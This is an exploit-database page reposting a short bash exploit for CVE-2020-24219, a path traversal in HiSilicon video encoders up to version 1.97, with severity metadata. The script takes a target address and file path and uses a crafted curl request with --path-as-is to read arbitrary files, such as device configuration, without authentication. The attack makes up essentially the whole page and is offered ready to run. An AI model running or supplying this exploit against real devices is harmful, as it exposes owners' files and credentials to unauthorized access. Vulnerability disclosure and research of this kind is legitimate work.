Advertisement






HiSilicon Video Encoder 1.97 File Disclosure / Path Traversal

CVE Category Price Severity
CVE-2020-24219 CWE-22 - Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') $500 High
Author Risk Exploitation Type Date
Unknown High Remote 2020-10-19
CPE
cpe:cpe:/a:hisilicon:video_encoder:1.97
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N 0.67 76.28

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020100120

Below is a copy:

HiSilicon Video Encoder 1.97 File Disclosure / Path Traversal
#!/usr/bin/env bash

# Exploit Title: HiSilicon video encoders - unauthenticated file disclosure via path traversal
# Date: 2020-09-20
# Exploit Author: Alexei Kojenov
# Vendor Homepage: https://www.szuray.com/
# Software Link: N/A
# Version: up to 1.97
# Tested on: Linux
# CVE: CVE-2020-24219
# Vendors: URayTech
# Reference: https://kojenov.com/2020-09-15-hisilicon-encoder-vulnerabilities/
# Reference: https://www.kb.cert.org/vuls/id/896979


if [ "$#" -ne 2 ]
then
  echo "Usage:   $0 <server>[:<port>] <filepath>"
  echo "Example: $0 1.2.3.4:8086 /box/box.ini"
  exit 1
fi

curl -s --path-as-is "http://$1/../../sys/devices/media/13070000.jpgd/../../../..$2" \
  || echo "ERROR: curl returned $?"

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum